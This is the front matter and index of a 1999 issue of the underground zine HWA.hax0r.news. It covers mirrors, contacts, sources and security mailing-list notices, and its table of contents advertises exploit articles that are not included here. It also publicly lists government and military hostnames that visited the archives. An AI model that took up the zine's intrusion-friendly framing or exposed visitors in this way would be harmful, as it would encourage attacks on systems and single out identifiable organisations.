[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 40 Volume 1 1999 Oct 31st 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== "ABUSUS NON TOLLIT USUM" ========================================================================== Rule #1 Noone talks about fightclub! _ )) .-'-'--. // | \ \ \ | | | | | | \ \| / / / `~~~~~~' __ __ _____ __ _ / / / /___ _____ ____ __ __ / ___/____ _____ ___ / /_ ____ _(_)___ / /_/ / __ `/ __ \/ __ \/ / / / \__ \/ __ `/ __ `__ \/ __ \/ __ `/ / __ \ / __ / /_/ / /_/ / /_/ / /_/ / ___/ / /_/ / / / / / / / / / /_/ / / / / / /_/ /_/\__,_/ .___/ .___/\__, / /____/\__,_/_/ /_/ /_/_/ /_/\__,_/_/_/ /_/ /_/ /_/ /____/ __ __ __ ____ _ _/_// / / /___ _/ / /___ _ _____ ___ ____ | | / / / /_/ / __ `/ / / __ \ | /| / / _ \/ _ \/ __ \ / / / / / __ / /_/ / / / /_/ / |/ |/ / __/ __/ / / / / / / / /_/ /_/\__,_/_/_/\____/|__/|__/\___/\___/_/ /_/_/_/ |_| /_/ _ )) .-'-'--. // | \ \ \ | | | | | | \ \| / / / `~~~~~~' =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= Today the spotlight may be on you, some interesting machines that have accessed these archives recently... infosec.se gate2.mcbutler.usmc.mil shq-ot-1178.nosc.mil dhcp-036190.scott.af.mil mcreed.lan.teale.ca.gov dodo.nist.gov kwai11.nsf.gov enduser.faa.gov vasfw02,fdic.gov lisa.defcen.gov.au ps1.pbgc.gov guardian.gov.sg amccss229116.scott.af.mil sc022ws224.nosc.mil sheppard2.hurlburt.af.mil marshall.us-state.gov digger1.defence.gov.au firewall.mendoza.gov.ar ipaccess.gov.ru gatekeeper.itsec-debis.de fgoscs.itsec-debis.de fhu-ed4ccdf.fhu.disa.mil citspr.tyndall.af.mil kelsatx2.kelly.af.mil kane.sheppard.af.mil relay5.nima.mil host.198-76-34-33.gsa.gov ntsrvr.vsw.navy.mil saic2.nosc.mil wygate.wy.blm.gov mrwilson.lanl.gov p722ar.npt.nuwc.navy.mil ws088228.ramstein.af.mil car-gw.defence.gov.au unknown-c-23-147.latimes.com nytgate1.nytimes.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= http://welcome.to/HWA.hax0r.news/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= Web site sponsored by CUBESOFT networks http://www.csoft.net check them out for great fast web hosting! http://www.csoft.net/~hwa =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= The Hacker's Ethic Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= A Comment on FORMATTING: Oct'99 - Started 80 column mode format, code is still left untouched since formatting will destroy syntax. I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns in the past I've endevoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim, I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= New mirror sites http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://net-security.org/hwahaxornews http://www.sysbreakers.com/hwa http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... ** Some issues are not located on these sites since they exceed the file size limitations imposed by the sites :-( please only use these if no other recourse is available. HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. *DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.projectgamma.com/archives/zines/hwa/ http://www.403-security.org/Htmls/hwa.hax0r.news.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #40 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =--------------------------------------------------------------------------= Issue #40 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ `ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= Quote of the week from irc.core.com's MOTD Y IS MY CPS GOING DOWN>>>> nEuSpEeD: Because when you type in caps, it takes more bandwidth. s nEuSpEeD: Therefore, your cps drops OH ok 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Two states tangle with 'cyber terrorist'......................... 04.0 .. Tempest Information Made Available .............................. 05.0 .. Virus That Hit Marines Identified ............................... 06.0 .. Love sick hacker hits Microsoft hard............................. 07.0 .. Russian ATMs Compromised ........................................ 08.0 .. Kentucky Emergency Sirens Activated - Hacker Blamed ............. 09.0 .. Over 24 Variants of Melissa Found With More to Come ............. 10.0 .. Online Threats Labeled Cyberterrorism ........................... 11.0 .. QPOP 2.41beta1 exploit (linux x86) by mastoras................... 12.0 .. ls0f.c Vulnerable: linux machines running lsof 4.40.............. 13.0 .. Free phone calls over the internet in the US..................... 14.0 .. Are You a Cyberspace Addict? s................................... 15.0 .. Congressman Lobbies IETF For Privacy ............................ 16.0 .. The King Of Hidden Directories by Zym0t1c........................ 17.0 .. The Hidden Directories text referred to in 16.0 (kM/mr Disco).... 18.0 .. Cable + Wireless Security Compromised ........................... 19.0 .. Yugo Cyber War Not As Widespread As First Thought................ 20.0 .. England To Launch High Tech Crime Unit .......................... 21.0 .. First Project Macro Virus Discovered ............................ 22.0 .. Microsoft Web Page Defaced ...................................... 23.0 .. Rubi-Con Wants You! ............................................. 24.0 .. Clinton Signs Phone-Tracking Bill Under 911 Cover ............... 25.0 .. Carry Tax on Dollars Proposed ................................... 26.0 .. $250 Million in Police Tech Approved ............................ 27.0 .. Interview With Web Inventor ..................................... 28.0 .. Computer Attacks Up Sharply in Hong Kong ........................ 29.0 .. AOL Password Scams Abound ....................................... 30.0 .. United Loan Gunmen Return ....................................... 31.0 .. Flipz' exploit................................................... 32.0 .. Fuqrag interview................................................. 33.0 .. Privacy and Encryption Labeled Antisocial By DOJ ................ 34.0 .. B02K Reviewed By WinNT Magazine ................................. 35.0 .. MP3 Pirates Beware .............................................. 36.0 .. Red Herring Reviews Defcon ...................................... 37.0 .. Hong Kong to Create Government Gateway .......................... 38.0 .. .mil and .gov Defacements on the Increase ....................... 39.0 .. CNet Chooses Top Ten 'Hacks' .................................... 40.0 .. MSNBC Special Report ............................................ 41.0 .. Cops Receive Info on Internet Crime Fighting .................... 42.0 .. LSU Experiences DOS Attack ...................................... 43.0 .. Oklahoma Paging System Vandalized ............................... 44.0 .. You Thought You Were Safe ....................................... 45.0 .. The Weather Channel and Four More .gov/.mil Sites Defaced ....... 46.0 .. Nerds Will Fight Next World War ................................. 47.0 .. Hole Found in Mac OS 9 .......................................... 48.0 .. Time Spreads Cable Modem FUD .................................... 49.0 .. DutchThreat Quit?................................................ 50.0 .. Can you protect your image on the net?........................... 51.0 .. Do secure email sites offer foolproof safety?.................... 52.0 .. Celtech ExpressFS USER Buffer Overflow Vulnerability ............ 53.0 .. Netscape Messaging Server RCPT TO DoS Vulnerability.............. 54.0 .. WFTPD Remote Buffer Overflow Vulnerability....................... 55.0 .. Pacific Software URL Live! Directory Traversal vulnerability..... 56.0 .. InfoSec for dummies parts I and II .............................. 57.0 .. Thwarting the systems cracker parts 1 to 6....................... 58.0 .. Crossroads: Linux networking and security........................ 59.0 .. Cool phone stuff on the internet (Check out mytalk its leet!).... 60.0 .. Securing DNS in FreeBSD/OpenBSD.................................. 61.0 .. Getting someone's IP thru ICQ without a hacking proggie.......... 62.0 .. Intrusion detection within a secured network..................... 63.0 .. Preparing your Linux box for the internet: Armoring Linux........ 64.0 .. Securing DNS (Linux version)..................................... 65.0 .. Exploit for FreeBSD sperl4.036 by OVX............................ 666.0 .. tcpdump bug 3.4a? by BLADI (bladi@euskalnet.net);................ 67.0 .. dopewarez.c exploit for Dopewars................................. 68.0 .. Linux forged packets............................................. 69.0 .. Nashuatec printer is vulnerable to various attacks............... 70.0 .. xmonisdn bug..................................................... 71.0 .. Nasty stack smashing bug in Linux-2.2.12 execve ................. 72.0 .. Finjan exploit alert............................................. 73.0 .. Hybrid network cablemodems....................................... 74.0 .. HP Printer display hack (source code)............................ 75.0 .. Omni-NFS/X Enterprise version 6.1................................ 76.0 .. More IE5 vulnerabilities......................................... 77.0 .. Insanity (Gov-boi from www.hack.co.za) dies in a car crash....... 78.0 .. "Secret" Nokia phone codes....................................... 79.0 .. Realnetworks snooping? .......................................... 80.0 .. Copying DVD movies?.............................................. 81.0 .. Elite irc falls.................................................. =-------------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.......... Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net Websites; sAs72.......................: http://members.tripod.com/~sAs72/ Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/ @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do. BUGTRAQ moves to a new home --------------------------- First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules. Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's. The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently. Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be: BUGTRAQ@SECURITYFOCUS.COM Security Focus also be providing a free searchable vulnerability database. BUGTRAQ es muy bueno -------------------- It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator. In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack). What is Security Focus? ----------------------- Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com. On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available: * Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to other that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits new trojan horses and viruses, source of attacks and tell-tale signs of intrusions. To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS INCIDENTS FirstName, LastName Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process. *Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com. On the information resource front you find a large database of the following: * Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well are links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade. * Products. An incredible number of categorized security products from over two hundred different vendors. * Services. A large and focused directory of security services offered by vendors. * Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly for our servers when possible. * Tools. A large array of free security tools. Categorized and available for download. * News: A vast number of security news articles going all the way back to 1995. * Security Resources: A directory to other security resources on the net. As well as many other things such as an event calendar. For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display. I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable. I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) Sender: ISN Mailing List From: mea culpa Subject: Where has ISN been? Comments: To: InfoSec News To: ISN@SECURITYFOCUS.COM It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occured, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe. As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. THey are providing the bandwidth, machine, and listserv that runs the list now. Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;) mea_culpa www.attrition.org --[ Old ISN welcome message [Last updated on: Mon Nov 04 0:11:23 1998] InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and effeciently filter past the articles of no interest. This list will contain: o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more. o Information on where to obtain articles in current magazines. o Security Book reviews and information. o Security conference/seminar information. o New security product information. o And anything else that comes to mind.. Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list. Please do NOT: * subscribe vanity mail forwards to this list * subscribe from 'free' mail addresses (ie: juno, hotmail) * enable vacation messages while subscribed to mail lists * subscribe from any account with a small quota All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s). Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributers. ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn 